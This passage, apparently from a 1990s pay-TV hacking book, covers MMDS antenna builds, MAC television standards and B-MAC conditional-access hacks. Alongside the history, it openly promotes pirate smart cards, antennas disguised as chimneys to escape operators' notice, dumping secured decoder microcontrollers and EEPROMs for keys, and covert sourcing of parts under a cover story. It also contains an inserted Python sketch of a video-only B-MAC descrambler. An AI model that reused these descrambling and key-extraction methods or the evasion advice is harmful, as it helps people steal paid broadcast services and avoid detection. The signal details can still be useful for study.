The ring Yagi design presented here is one that has been used by hackers 
in the United States for the reception of MMDS. There should be no 
problem in obtaining any of the components for this antenna. The driven 
element is made from a strip of copper, and the reflector and directors are 
fabricated from aluminium strip of 3/10 inch thickness. 


The Helical Antenna 


The helical antenna is essentially a coil of wire wound on the outside of a 
plastic pipe. The main equations governing this type of antenna are given in 
the diagram. This antenna offers 12dBi gain for a seven turn helix. The 
impedance of such an antenna would be in the region of 140R and requires 
a quarter wavelength transformer to match it to the input impedance of the 
converter. Ideally low loss insulators should be used to hold the helix rigid 
but the plastic tube is a readily available, though lossy compromise. 
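The dish formulas from the Parabolic Reflector diagram and the helix formulas above, worked through in Python as an added example (not code from the book): it checks the 64 cm dish quoted for 22 dBi at 2.5 GHz (with the diagram's n = 0.5 it comes out at 21.5 dBi, and 22 dBi needs n of about 0.56), inverts the gain formula to size a dish, applies the λ/8 mesh-gap rule, and sizes the helix and its quarter-wave matching section. The 50R converter input and the quarter-wave transformer rule Zt = sqrt(Za x Zo) are assumptions, not given on the page.

```python
"""MMDS antenna sizing from the parabolic and helical formulas in the diagrams.

Added example, not the book's own code.  Implements:
  gain_dBi = 10 log10(n * (pi * D / lambda)^2)     (parabolic reflector)
  f = D^2 / (16 c)                                 (focal length from depth)
  mesh gap < lambda / 8 at the lowest frequency    (reflector surface rule)
  P = lambda / 4,  D = lambda / pi                 (helix pitch and diameter)
Assumed, not from the book: a 50R converter input and the quarter-wave
transformer rule Zt = sqrt(Z_antenna * Z_line) for the 140R helix feed.
"""
import math

C_M_PER_S = 299_792_458.0  # speed of light in free space


def wavelength_m(freq_hz):
    """Free-space wavelength in metres."""
    return C_M_PER_S / freq_hz


def parabolic_gain_dbi(diameter_m, freq_hz, efficiency=0.5):
    """Dish gain; the diagram quotes a typical efficiency n of 0.5."""
    lam = wavelength_m(freq_hz)
    return 10.0 * math.log10(efficiency * (math.pi * diameter_m / lam) ** 2)


def parabolic_diameter_for_gain_m(gain_dbi, freq_hz, efficiency=0.5):
    """Inverse of the gain formula: D = (lambda / pi) * sqrt(10^(G/10) / n)."""
    lam = wavelength_m(freq_hz)
    return (lam / math.pi) * math.sqrt(10.0 ** (gain_dbi / 10.0) / efficiency)


def efficiency_for_gain(gain_dbi, diameter_m, freq_hz):
    """Efficiency n a dish of the given size would need to reach gain_dbi."""
    lam = wavelength_m(freq_hz)
    return 10.0 ** (gain_dbi / 10.0) / (math.pi * diameter_m / lam) ** 2


def focal_length_m(diameter_m, depth_m):
    """Focal length of a parabola of diameter D and depth c: f = D^2 / 16c."""
    return diameter_m ** 2 / (16.0 * depth_m)


def mesh_gap_ok(gap_m, lowest_freq_hz):
    """True if a mesh reflector's hole size is under lambda/8 at the lowest frequency."""
    return gap_m < wavelength_m(lowest_freq_hz) / 8.0


def helix_dimensions_m(freq_hz):
    """(pitch, diameter) of the helix from P = lambda/4 and D = lambda/pi."""
    lam = wavelength_m(freq_hz)
    return lam / 4.0, lam / math.pi


def quarter_wave_transformer_ohms(z_antenna, z_line):
    """Impedance of a quarter-wave matching section (assumed rule, see above)."""
    return math.sqrt(z_antenna * z_line)


if __name__ == "__main__":
    f_mmds = 2.5e9  # the 2.5 GHz figure used in the text
    inch = 0.0254
    print(f"wavelength at 2.5 GHz: {wavelength_m(f_mmds) * 100:.1f} cm")
    print(f"64 cm dish, n = 0.5: {parabolic_gain_dbi(0.64, f_mmds):.1f} dBi")
    print(f"efficiency needed for 22 dBi at 64 cm: "
          f"{efficiency_for_gain(22.0, 0.64, f_mmds):.2f}")
    print(f"dish for 22 dBi at n = 0.5: "
          f"{parabolic_diameter_for_gain_m(22.0, f_mmds) * 100:.0f} cm")
    print(f"focal length, 64 cm dish 8 cm deep: {focal_length_m(0.64, 0.08):.2f} m")
    print(f"1/4 inch mesh usable at 2.5 GHz: {mesh_gap_ok(0.25 * inch, f_mmds)}")
    pitch, diam = helix_dimensions_m(f_mmds)
    print(f"helix pitch {pitch * 100:.1f} cm, diameter {diam * 100:.1f} cm")
    print(f"quarter-wave section, 140R to 50R: "
          f"{quarter_wave_transformer_ohms(140.0, 50.0):.1f} R")
```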


The Ray Gun Antenna 


The ray gun antenna can be thought of as a ring Yagi with solid directors. 
The primary difference between this and the ring Yagi described earlier is 
the feed method. The "ray gun" is fed using a wave guide arrangement. The 
waveguide can be fashioned out of a large tin can of the type used for 
catering. This wave guide without the "ray gun" assembly can give a gain in 
the region of 10dBi. 


The Funnel Antenna 


A further antenna type is the cone or funnel. The basis of this type of 
antenna is a cone of wire mesh on the tin can waveguide. The cone can be 
solid if required. A gain of 16 to 17dBi is possible with this antenna. When 
assembled, this antenna looks like a smoke stack on a chimney. This type 
of antenna has been used successfully by some American hackers. The 
people who worked for the MMDS companies couldn't tell them from real 
smoke stacks. Due to the ease of construction, this antenna will probably 
become a widely used antenna by the Irish hackers. 
[Figure: Ring Yagi Antenna]
Driven element: 14.1 cm circumference, with the coax conductor and braid 
soldered to the element across a 0.3 cm PTFE spacer; fed with RG8 through 
an N or BNC type socket. Reflector element: 14.7 cm circumference. 
Director elements: 12.6 cm circumference. All elements are formed from 
3/16" wide aluminium strip; thickness is typically 20 SWG or 22 SWG. The 
boom is angle aluminium. S is a square aluminium sheet reflector of 
dimensions 6.8 cm by 6.8 cm.

Element order along the boom: S, R, DE, D1 to D22.

Distances: a = 4.73 cm, b = 1.45 cm, c = 1.70 cm, d = 1.20 cm, 
e = 2.70 cm, f = 2.70 cm, g = 5.40 cm.
[Figure: Helical Antenna]
Aluminium sheet reflector, 18 cm by 18 cm, with an N type or BNC socket. 
Other dimensions marked: 16 cm, 18 cm.

P = λ/4
D = λ/π

Where λ is the freespace wavelength of the frequency in use.

Materials: The helix is made from 8 AWG copper wire. 1 3/4" outside 
diameter plastic pipe is used to support the helix. The reflector is made 
from sheet aluminium, though mesh could be used.
[Figure: Ray Gun Antenna]
Labels: 10.685" length; 0.25" diameter hole; 1.75" outside diameter, 0.032" 
thickness; 0.25" inside diameter tube; 34.75" length of 0.25" threaded bar. 
Coffee can feed in plastic drain pipe, 4" outside diameter. Open end of feed 
is placed 1.75" from end cap. White plastic end cap.
[Figure: Funnel Antenna]
1 lb coffee can feed with N type or BNC type socket. Probe is 2.9 cm of 
copper wire, TV coax conductor or similar. Dimensions marked: 52 cm, 
189 cm, 58.5 cm, 45.75 cm.

The funnel is constructed from quarter inch wire mesh over a rib structure. 
Four to eight ribs are necessary for rigidity. The open end of the feed can 
be covered with a white plastic cover.
Postscript 


MMDS in Ireland has not been a great success. Nor has it been a great 
failure. The rebeam operators, individuals rebroadcasting the UK channels 
illegally on UHF are still in existence. This is primarily due to some amazing 
events in 1994. The current, (at the time of writing), Prime Minister, John 
Bruton had no inkling that his Fine Gael party was going to be in a coalition 
government within a few weeks. He was at a meeting of rebeam operators 
in Cork and he was promising them that he would, if his party ever got back 
into power again, look at the situation of the illegality of rebeam operations. 
Of course at that time his party did not seem to have a remote chance of 
getting back into power. 


An unfortunate set of events led to the collapse of the Fianna Fail-Labour 
coalition government and Mr Bruton's party entered into coalition. The 
rebeam operators then brought up the matter of the speech he had made a 
few weeks just before. Mr Bruton, being a man of his word, was apparently 
bound to examine the situation. The result is that the situation is not 
resolved yet. The rebeam operators are still in operation and so are the 
MMDS operators. The superior service from the MMDS operations is 
winning more subscribers. 


In most implementations of MMDS in Ireland, the downconverter and the 
descrambler are two separate units. At this stage, no manufacturer has 
marketed an Integrated Downconverter Descrambler (IDD). The majority of 
the downconverters seem to be cheap Taiwanese models. There are some 
good ones but the overriding concern for most cable companies is cost. 


The option of developing a hacker downconverter is an attractive one 
especially to anyone with amateur radio experience. However the risks of 
being caught are high. 


The main systems that are being used to scramble MMDS signals are 
baseband type systems. RF based systems such as synch suppressed 
systems are not usually permitted and are generally a bad choice due to the 
fact that most of them are compromised already. The signal transmitted on 
MMDS has to be standard PAL. This would leave Discret, Syster and 
Cryptovision as the only realistic options. VideoCrypt-S might actually be an 
option for some of the smaller cablenets as the VideoCrypt-S decoders are 
now on sale for as little as £5 per box after the collapse of the BBC Select 
service. A pirate smart card design could easily be pressed into service. 


However, two of these systems are not secure. Discret has been 
hacked since the early eighties. It has been in use on satellite during that 
period and the designs for a pirate descrambler are readily available. Indeed 
they are given as a case study in Chapter 3. 


Cryptovision is apparently hacked as well though there is a catch that has 
prevented any large scale damage to the networks. This system is used on 
Cablelink, the biggest cable and MMDS operator in Ireland. This gives it a 
potential user base of over 400,000. 


However Cablelink only scramble the premium channels and the decoders 
are expensive. The only source for them at the moment in Ireland is, 
naturally, Cablelink. 


The cost of the official decoder, over £150, means that hackers are not that 
keen to purchase a decoder to watch Sky Sports and the Sky movie 
channels. Especially when the full Sky package can be hacked on satellite 
with a pirate smart card costing around £200. 


Naturally this edge will be lost over the next few years. No doubt on the 
advice of some clueless consultants, who only know about finance, they will 
introduce blanket scrambling. This will mean that everyone on the Cablelink 
cablenets will require a decoder. As a result piracy will flourish. 
At a meeting in 1977, the World Administrative Radio Council, (WARC), 
formulated the guidelines for Direct Broadcast via Satellite. No transmission 
standard was recommended. A number of transmission standards were 
developed in the early eighties for DBS. The two front runners were 
Extended PAL, (E-PAL) and Multiplexed Analogue Component, (MAC). 
Fortunately DBS did not evolve as WARC 77 envisaged. In fact it would 
seem that the world just ignored the WARC. Considering that the main 
people involved were civil servants and members of monopoly PTTs that 
was probably a good thing. 


Their predictions were based on an LNC noise figure of 7 dB. The problem 
with technology in general is that things do not proceed at the orderly sedate 
pace of the mind of a bureaucrat. In technology, things move explosively as 
new developments render huge swathes of equipment obsolete. This is 
exactly what happened with the WARC proposals. 


The dominant technology in microwave electronics at the time was silicon 
and the noise figures of the best transistors of the time were in the region of 
3 dB. But the advent of Gallium Arsenide (GaAs) technology allowed noise 
figures on transistors to drop below 1 dB. The effect on the WARC 
proposals was devastating. 


WARC had planned on satellite transponders with EIRPs of 64 dBW and 90 
cm dishes. What had become possible was that the lower power satellite 
transponders, with EIRPs in the region of 50 dBW could deliver the same 
performance with the lower noise figure equipment. 


However the governments in Europe had adopted the WARC specifications 
in their never ending vain battle against reality. They auctioned franchises 
for the right to broadcast using these frequency allocations and orbital slots. 
To some of us, it was like these governments were auctioning deckchairs 
on the Titanic and the news that the ship had sunk had not reached them. 


Closely following this questionable decision making pattern, the EC 
bureaucrats decided on the MAC system. It was a good system but it was 
the wrong answer from a technical point of view. Their motives were right. 
By choosing MAC, the EC put the Japanese at a disadvantage. European 
firms were in the lead in MAC technology as the patents were held by 
European firms. It seemed that the whole idea was that things would 
progress in an orderly linear fashion with the market being regulated by the 
EC. Markets seem to work on Chaos Theory and things that go bump in the 
night. 
The elements of chaos were ASTRA and Rupert Murdoch's Sky Television 
venture. The ASTRA channels were primarily PAL based services. Sky 
launched in PAL and there was little that the UK government and their 
regulatory commissions could do about it. After all they were broadcasting 
from a non-UK satellite. The ensuing war between Sky and the government 
authorised service, British Satellite Broadcasting (BSB) nearly destroyed 
both companies but the D-MAC system was the ultimate victim. 


The whole BSB fiasco was just like a scene out of one of Douglas Adams's 
books. Specifically, it was like the scene where the stone age marketing 
executives sit around trying to decide what colour to paint the wheel. 


In retrospect it seems even funnier. The old expression of not trying to 
reinvent the wheel could be applied here. These people not only tried to 
reinvent it but they made it square. At the first major press conference, their 
square antenna was made of wood. Then they came up with some utterly 
stupid advertising campaign about it being "hip to be square". Obviously 
their strength lay in that realm of self-deceit called advertising. 


So while they fiddled in their marble paved palace with expensive 
advertising campaigns, wooden antennae, and generally doing lunch 
meetings, their venture sputtered out. More precisely it was sold out in a 
backroom deal in a hotel in the UK. The first that the chief of BSB knew of 
this was when someone telephoned him to tell him that he was fired. The 
French have an expression that might be applied here - something about 
making an example. But what this event showed was that the satellite 
television business is no place for pompous rank amateurs. 


ASTRA and Sky had been first. To paraphrase an American Civil War 
Confederate soldier: "Who ever gets there first with the most wins". This 
time, Johnny Reb won. 


Throughout Europe, MAC did not fare well. It has seen sporadic use. The 
reunification of Germany meant that D2-MAC was not going to be accepted 
by German broadcasters. They preferred to operate in PAL. There were 
some disagreements about the system and protocols with the result that the 
whole unified approach to a European standard fragmented. 


Even their attempts to have a high definition digital television standard 
collapsed. Well it was heavily based on the D2-MAC standard. One thing 
should be very clear to these bureaucrats: the market creates standards. 
The MAC system transmits the luminance and the chrominance separately. 
Both are time compressed. The compressed components are then 
transmitted sequentially. The components are expanded and combined to give 
YUV or RGB at the receiver using digital techniques. 


The compression of the video information allows greater depth for audio 
and teletext services. The line synch in the PAL system is transmitted as a 
pulse in each line. The pulse takes a considerable amount of the actual line 
time. With the MAC system, the line synch can be derived from a six bit 
synch word in the data block. 


MAC has a specific advantage over PAL when used in a satellite channel. In 
a frequency modulated system, the noise voltage to frequency response is 
triangular. The noise voltage rises almost linearly with frequency. In the PAL 
signal, the colour or chrominance information is mainly in the upper section 
of the baseband signal, (3.5MHz to 5.5MHz). As a result, the highest noise 
voltage appears in the chrominance producing a lower signal to noise ratio. 
Pre-emphasis only offers slight compensation for this effect. De-emphasis 
can have one disadvantage when dealing with a near threshold PAL signal. 
Dot sparklies become streak sparklies due to the response of the 
de-emphasis network. 


There are a number of MAC variants. Some of these variants have fallen into 
disuse. The most common variants in use are B-MAC, D-MAC and 
D2-MAC. C-MAC is still sporadically used. 


MAC Variants 


A-MAC 


This was the first version of the MAC family. The audio on this variant was 
on a 7.16 MHz subcarrier. It is not in use any more. It was essentially the 
prototype MAC system. 


B-MAC 


This version of MAC uses line delay as the video scrambling element. This 
is achieved by varying the length of the data packet. The data modulation 
format is 2-4 PSK. It is used by the AFRTS and the SIS Racing Channel. 


C-MAC 


This is the original EBU MAC specification. Frequency modulation was used 
for the video section of the line. Phase modulation was used for the data 
[Figure: D2-MAC line, showing the DATA, CHROMA and LUMINANCE sections]
MAC offers a considerable saving in the time taken for elements such as 
synch. In the PAL waveform, the synch occupies a major section of the line. 
The horizontal blanking takes up just over a fifth of the total line time.

In the MAC signal, the chrominance is compressed by 3:1 and the luminance 
is compressed by 2:1. This leaves the 10µs synch area to be occupied with 
data.

[Figure: PAL baseband spectrum, showing the colour subcarrier and colour 
sidebands against the triangular FM noise curve]
The noise in a frequency modulated PAL channel increases triangularly with 
frequency. As can be seen from the diagram, the noise is worst in the colour 
section of the spectrum.
9-4 


9: Multiplexed Analogue Component 


packet. It require two demodulators at the receiver. Its bandwidth limited it to 
satellite broadcast use only. The 27 MHz required bandwidth was too large 
for cablenets. It has now largely fallen into disuse. 


D-MAC 


This system was used by British Satellite Broadcasting (BSB, later merged 
into BSkyB) from its satellite at 31 degrees West. The D-MAC system can 
carry up to eight 15 kHz audio channels. It uses duobinary encoding of the 
data to reduce the bandwidth required on a cablenet to approximately 
10.5 MHz. 


This is still too wide for most European cablenets. This resulted in the 
D-MAC standard becoming a uniquely English standard. The rest of Europe 
chose D2-MAC. With the demise of BSB and the sale of the satellites, this 
standard has become obsolete. It was unfortunate as it is a relatively good 
implementation. However the whole BSB fiasco does show the dangers of 
clueless individuals and committees trying to dictate what the free market 
should have. 


The only good thing to come out of this fiasco was all of the BSB D-MAC 
IRDs which have been cheaply converted into D2-MAC EuroCrypt IRDs. 


D2-MAC 


This variant is a subset of D-MAC with half the audio capacity. As a result 
it fits in the 8 MHz bandwidth of a cablenet channel. It is the most widely 
used MAC variant. There are a number of encryption standards used on 
D2-MAC: EuroCrypt-M, EuroCrypt-S, EuroCrypt-S2 and EuroCrypt-S*. 


D2-MAC is the standard and most widely used variant. Though it is largely 
used by Scandinavian channels, it has also been used in France by Canal 
Plus and Rendezvous. The security of the channels using it is poor, as they 
seem to have ignored the relatively strong key handling procedures 
available to them, which would have given greater security. The reason for 
its collapse is technological. 


S-MAC 


This variant, also known as Studio MAC, is not used in broadcast 
applications because of its large bandwidth. The Y component is compressed 
by 2:1 and the U and V components by 4:1. This allows the multiplex to be 
carried in an ordinary PAL or NTSC line period complete with standard synch 
pulses. Its primary users are US studios. 
Scientific Atlanta B-MAC 


Scientific Atlanta's B-MAC is currently in operation on Europe's largest 
private network, the Satellite Information Services' Racing Channel, which 
is supplied to a network of bookmakers' shops. There are four users of the 
system: Ladbrokes, William Hill, Coral and Mecca. Each user has its own 
audio channel, and the teletext service gives the results. 


British Telecom initially supplied the decoders and receivers to SIS. The 
decoders were recognisably Scientific Atlanta but there was some question 
as to the origin of the receivers. The receiver was reverse engineered and 
turned out to have been manufactured by JRC. Apparently a separate 
production line had been set up by JRC for these receivers. 


The receiver differed from other receivers of the period: its baseband 
response had been widened to 10 MHz and smoothed to take the B-MAC signal. 
There was also an integrated receiver decoder version. 


There are two versions of B-MAC, the 625 line version used in Europe and 
Australia and the 525 line version used in the USA and Canada. The 
architecture of the decoders is similar and in most areas identical. The 
primary differences are in the system clock rate and the central 
microcontroller. 


The main application of the B-MAC system appears to be narrowcasting 
rather than broadcasting. It is commonly used for high pay services such as 
sports events. It is also used on some of the intra-company video 
conferencing links. One of the factors in this has been the relatively high 
price of the decoder. 


In the United States and Canada, B-MAC has been mainly used on high pay 
services. The US variety has been totally hacked. It is possible to purchase 
replacement chips and out-boards that will give access to various high fee 
channels. 


Adverts for decoders capable of decoding the B-MAC encrypted channels 
accessible in Europe have appeared in the main satellite television 
magazines in Europe. The UK magazines “What Satellite” and “Satellite TV 
Europe” have carried news items and adverts for these modified decoders. 
It is a logical conclusion that the system is now totally compromised in 
Europe and North America. 


The B-MAC system is an old system. It reflects the scrambling technology 
of the mid eighties. Whereas the D2-MAC and D-MAC scrambling systems 
use cut and rotate, the B-MAC system uses a form of active line delay. In 
the light of developments in hacking, this type of scrambling is now 
woefully inadequate. 

It would be technically feasible to build a video only descrambler for under 
£200 using existing technology. With the horse racing channel, most 
prospective viewers would be satisfied with a black and white picture. The 
audio is sometimes available on radio links. 

The audio modulation is Adaptive Delta Modulation (see Chapter 2). The 
digital audio and control data occupy the first 11 µs of the waveform. The 
data block is at most 75 symbols wide and at least 45 symbols wide, so by 
varying the amount of data in the line the starting position of the video 
is varied: this is the line delay scrambling. 


The basic operation of the B-MAC system is similar to other MAC systems 
in that each line has three packets: data, chroma and luma. The time 
division multiplexer works in sample periods of about 47 ns, which 
equates to 1365 samples per 64 µs line. D2-MAC differs from this in that it 
has only 1296 samples per line. 


The sample frequency and sample allocation for each B-MAC line are as 
follows: 

625 Line B-MAC 

Sample Clock Frequency:     21.328 MHz (est) 
Luminance:                  750 Samples    35.165 µs 
Chrominance:                375 Samples    17.582 µs 
Luma-Chroma Transition:       6 Samples     0.281 µs 
Data:                       234 Samples    10.971 µs 
(Total: 1365 samples, 64 µs) 

525 Line B-MAC 

Sample Clock Frequency:     21.479 MHz 
Luminance:                  750 Samples    34.918 µs 
Chrominance:                375 Samples    17.459 µs 
Luma-Chroma Transition:       6 Samples     0.279 µs 
Data:                       234 Samples    10.894 µs 
(Total: 1365 samples, 63.55 µs) 


Data Structure And Format 


The modulation format used is Differential Quadrature Phase Shift Keying 
(DQPSK). This format is covered in Chapter 2 in the NICAM section. From 
this point on the values used are for 625 line B-MAC. 

Each data symbol is three samples long, which gives a data block of 78 
symbols per line in the unscrambled format. The symbol rate is 455 times 
the line frequency, or 7.109375 Msymbol/s. Averaged over the whole line the 
data rate is 78 symbols times 15.625 kHz, about 1.22 Msymbol/s. 


The six audio channels and the clock reference burst are transmitted in 
what would ordinarily be the horizontal blanking period of the PAL 
waveform. This 11 µs is occupied by the data symbols. 


Each symbol is a pair of bits in a four state modulation format. Twenty 
symbols are reserved for the clock reference burst. This is a two level 
signal ten cycles long at 277.5 times the line frequency, or 4.3359375 MHz. 
The average level of this burst determines the zero chrominance level. 


Each data block consists of 2 separation symbols, 45 symbols, 2 separation 
symbols, 20 clock reference burst symbols, 2 separation symbols and 6 
symbols (these figures total 77 symbols, one short of the 78 quoted above). 


The audio channels are transmitted using the Dolby Deltalink system, the 
adaptive delta modulation system covered in Chapter 2. Each audio channel 
contributes thirteen samples and one control bit during each line period. 
The function of the control bit alternates with each line: it controls two 
things, the step size and the de-emphasis. Two error concealment bits and a 
parity bit are contained in each channel; the parity bit is used to check 
the six error concealment bits in each data block. A data channel is also 
provided for, using two bits. The audio data rate is about 204 kbit/s 
(thirteen samples per line at the 15.625 kHz line rate). 


The teletext is transmitted during the vertical blanking interval. The VBI is 
nominally twenty five lines long. In addition to VBI test waveforms, this 
period contains the teletext in packets of data each 377 symbols long. Lines 
9 to 13 carry the actual teletext packets. Lines 1 to 8 carry the subscriber 
address, the clock recovery data and the synch recovery data. The teletext 
is in ASCII format at a rate of forty characters per line. As the teletext 
service is valuable in its own right, it is encrypted. 


Access Control 


The access control system in the B-MAC decoder appears to be hierarchi- 
cal. Each decoder has an identity which is embedded in the decoder's 
microcontroller. This identity is used to decrypt the authorisation data and 
possibly the period keys. The period keys are then used to decrypt the 
session key or seeds. 
There is a set of period keys which each decoder must have in order to 
decrypt the session keys properly. In the United States, some channels 
change the key set every Wednesday. The period keys are stored in 
EEPROM, but a set of period keys on its own will not make the decoder 
operate as a pirate decoder. 


The B-MAC encoder generates the encryption pattern based on a seed that 
can, if necessary, be changed every quarter of a second. This seed is then 
transmitted in an encrypted format in one of the packets in the VBI. In this 
respect B-MAC is similar to D2-MAC and its period key - session key - 
control word hierarchy. 


The actual cryptographic algorithm is said to be similar to the Data 
Encryption Standard. It may be based in part on DES but, given the 
restrictions on exporting DES equipment, it would have had to be 
significantly different. Since there is not enough public information on 
the algorithm, hackers have not approached it from this angle; the 
hardware avenue was much easier. 


B-MAC Hacks 


The B-MAC system is an old system. What was secure in the mid eighties is 
not secure now. The technology has advanced and so have the skills and 
resources of the hackers. 


One of the things that made the video section of B-MAC secure was that it 
was digitally compressed and it was in a non-standard format. The cost of 
video ADCs and DACs was relatively high. Therefore the reasoning was 
that hackers would not be able to afford to hack the video. More importantly 
the potential customers would not be able to afford the pirate video 
descramblers. 


The logic was good for a finite lifetime system. Unfortunately B-MAC is not 
a short lifetime system. When a company uses B-MAC it is in for the 
duration. The cost of the decoders is relatively high and therefore 
re-equipping the network would be costly. 


As the technology available to hackers progressed, B-MAC became a 
sitting target. While there was a policy of upgrading the technology, there 
were a lot of decoders in the field. Retrofitting these decoders would be a 
costly affair and most channels and services seemed to prefer to absorb the 
minimal piracy. 


The hacks on B-MAC fall into two classes: the stand alone video hack and 
the hook hack. Of the two, the hook hack is the more damaging. 
The Hook Hack 


When the channels in the United States started to scramble with 
VideoCipher II, B-MAC also came under examination. While the hack on B-MAC 
was not as simple as the VideoCipher II hack, it was hacked. At first, 
strange messages started to appear on American hacker bulletin boards. 
They mentioned the Zero Power Chip, which was supposed to replace a chip 
in the B-MAC decoder and provide descrambled video and audio. 


Apparently what had happened was that someone had figured out how to 
extract the identity from the B-MAC decoder's microcontroller. The micro- 
controller was supposedly secured but by some method it was possible to 
jam it and read the program. Scientific Atlanta had blown the read fuses. 
The microcontroller used in the 525 B-MAC decoders was the 68705. This 
is the EPROM version of the 6805 microcontroller. 


Of course the decoder needed the period keys to operate properly. The 
keys were stored in the 9346, a 1 Kbit serial EEPROM. Initially these keys 
were not changed with any great frequency. Possession of the keys alone 
was not enough to make the decoder operate: the decoder had to be 
authorised, and the authorisation data may have been stored in the RAM of 
the microcontroller. 


It is now possible to buy a 68705 reader. This piece of electronics will allow 
you to dump the contents of the B-MAC decoder's 68705. The more recent 
decoders use the 68HC11 microcontrollers. These microcontrollers do not 
have any reliable security anymore. The fact that the VideoCrypt decoders 
used the 68705 as the main secured microcontroller and the contents of this 
chip are widely available shows that the chip is not secure. The 68HC11 is 
also used in the pirate Nagra SECAM decoder. The contents of that 
microcontroller are also available. 


The Video Only Hack 


The weakness of the video section should be apparent. To descramble the 
video, a circuit to differentiate between data and video has to be built. 


By using the chroma reference level between the data burst and the 
chroma, the line stores can be triggered. This is the key to descrambling the 
video. The output of this circuit can be used to gate the video into a three 
line store. 


The video detection circuit is suggested because trying to determine the 
delay sequence may be difficult. As the data block is within preset limits, a 
window comparator could be used. 
The line stores would be of different lengths. The first line store would 
be a temporary memory for the incoming line. The second line store would 
hold the line being operated on. The contents of this line would be clocked 
into the third line store at a slower frequency, which digitally expands 
the video. The output of the third line store would then be fed to the 
digital to analogue video converter. 
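The video-only hack described above, as an added example in Python; this is not code from the book or from Scientific Atlanta. It assumes things the text does not fix: the line is already sample aligned, the data burst is a 4-level baseband signal whose levels never fall inside the comparator window, a short flat run at the zero-chroma reference level sits between the data burst and the compressed chroma, and the expansion ratios are 3:1 for chroma and 3:2 for luma, which turn the 375 and 750 samples into the same 1125-sample active line. The point it shows is that the window comparator finds the start of the video without knowing the delay sequence at all.

```python
"""B-MAC video-only descrambling principle (line-delay scrambling).

Added illustration; not code from the book or from Scientific Atlanta.
Assumptions (mine, not the source's): samples are line aligned; the data
burst is a 4-level signal whose levels never fall within the comparator
window; a flat run at the zero-chroma reference level sits between the
data burst and the compressed chroma; expansion is 3:1 (chroma) and
3:2 (luma).
"""
import random

SAMPLES_PER_SYMBOL = 3                       # one DQPSK symbol = 3 samples
DATA_MIN_SYMBOLS, DATA_MAX_SYMBOLS = 45, 75  # data burst width varies per line
CHROMA_SAMPLES, TRANSITION_SAMPLES, LUMA_SAMPLES = 375, 6, 750
REF_LEVEL = 0.0           # zero-chrominance reference level
REF_SAMPLES = 6           # assumed length of the flat reference run
DATA_LEVELS = (-1.0, -0.5, 0.5, 1.0)  # assumed 4-level data symbol values
ACTIVE_OUT = 1125         # 375 * 3 == 750 * 3 / 2


def build_scrambled_line(luma, chroma, data_symbols, rng):
    """Constructed line: [data burst][reference][chroma][transition][luma].
    The video start moves with data_symbols; that movement is the scrambling."""
    assert len(luma) == LUMA_SAMPLES and len(chroma) == CHROMA_SAMPLES
    assert DATA_MIN_SYMBOLS <= data_symbols <= DATA_MAX_SYMBOLS
    line = []
    for _ in range(data_symbols):
        line += [rng.choice(DATA_LEVELS)] * SAMPLES_PER_SYMBOL
    line += [REF_LEVEL] * REF_SAMPLES
    line += list(chroma)
    line += [REF_LEVEL] * TRANSITION_SAMPLES
    line += list(luma)
    return line


def find_video_start(line, ref=REF_LEVEL, tol=0.05, min_run=4):
    """Window comparator: the first run of min_run samples inside ref +/- tol
    is taken as the reference run; the chroma starts right after it.
    No knowledge of the data length (the delay sequence) is needed."""
    run = 0
    for i, sample in enumerate(line):
        if abs(sample - ref) <= tol:
            run += 1
            if run == min_run:
                run_start = i - min_run + 1
                return run_start + REF_SAMPLES
        else:
            run = 0
    raise ValueError("no reference level run found")


def expand(samples, out_len):
    """Time-expand by linear interpolation: the third line store read out
    at a slower clock than it was written with."""
    n = len(samples)
    out = []
    for k in range(out_len):
        pos = k * (n - 1) / (out_len - 1)
        i = int(pos)
        frac = pos - i
        if i + 1 < n:
            out.append(samples[i] * (1 - frac) + samples[i + 1] * frac)
        else:
            out.append(samples[i])
    return out


def descramble_line(line):
    """Gate chroma and luma out of the line and expand both to ACTIVE_OUT."""
    start = find_video_start(line)
    chroma = line[start:start + CHROMA_SAMPLES]
    luma_start = start + CHROMA_SAMPLES + TRANSITION_SAMPLES
    luma = line[luma_start:luma_start + LUMA_SAMPLES]
    if len(chroma) != CHROMA_SAMPLES or len(luma) != LUMA_SAMPLES:
        raise ValueError("line too short after detected video start")
    return expand(chroma, ACTIVE_OUT), expand(luma, ACTIVE_OUT)


if __name__ == "__main__":
    rng = random.Random(1)
    luma = [0.1 + 0.8 * k / (LUMA_SAMPLES - 1) for k in range(LUMA_SAMPLES)]
    chroma = [0.3 * ((k // 50) % 2) for k in range(CHROMA_SAMPLES)]
    for n in (DATA_MIN_SYMBOLS, 60, DATA_MAX_SYMBOLS):
        line = build_scrambled_line(luma, chroma, n, rng)
        print(n, "data symbols: video starts at sample", find_video_start(line))
```

A real build would put the comparator in front of the line store write enable and clock the third store from a divided sample clock rather than interpolate in software, but the decision it makes is the same one `find_video_start` makes: trigger on the reference level, not on a recovered delay sequence.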


Although B-MAC is the primary system for high fee applications in Europe, 
there seem to have been few if any commercial hacks there. The incentive to 
hack it is there: some hackers are frequently offered sums of over one 
thousand pounds for a pirate decoder, more often than not for a video only 
decoder. There have been a few video only decoders in Europe, but these 
were built for personal rather than commercial use. 


The one thing that has worked in favour of the Racing Channel is that it is 
easier to go to the betting shop than to buy a decoder. In some cases, the 
service used by the betting shops could be rebroadcast. 


Since the Racing Channel is a specialised service, the demand breakdown 
is different from that of a movie channel. The main demand for pirate 
decoders comes from those actually involved in the racing business. These 
people have the money to pay but were unable to obtain the service from 
SIS. SIS have launched a lower cost version of their service using 
VideoCrypt. However it is a cut down service and people still want more. 


Examining the B-MAC decoder provided some problems. In the early days 
of the SIS Racing Channel, the decoders were hardwired into the mains 
supply. If the power went down the decoder had to be reauthorised. The 
procedure for this involved a telephone call to the authorisation centre in the 
UK. 


Any real examination had to be carried out when the decoder was powered 
up and authorised. This was the easy part. The cover was taken off the 
decoder. The cameras and oscilloscopes were ready. Then the photo- 
graphs were taken. Unfortunately electronic flashes were used. The voltage 
spike was picked up by the decoder circuitry and the decoder was reset. 
The flashes were quickly replaced by magnesium flash bulbs and the 
decoder was reauthorised. 


With the photographs, it was possible to start to draft a circuit diagram. 
Time was of the essence. The work could only be carried out when there 
were no punters about. The photographs were developed and the circuit 
diagrams were drafted. It was perhaps one of the most complex reverse 
engineering operations in Europe to that time. 
The next stage of the operation was to source all of the components without 
arousing any suspicion. One of the worst mistakes that any hacker can 
make is to openly ask for information on a custom chip without a good 
backup story. 


The conclusion was that the only feasible method was to dump the secured 
microcontroller and the EEPROM. Dumping the EEPROM was the easy part. The 
EEPROM IC was a 9346, a 1 Kbit serial EEPROM; the 256 bit version of the 
same family is used in mobile telephones to store the telephone's 
electronic serial number. A modified EPROM programmer copied this 
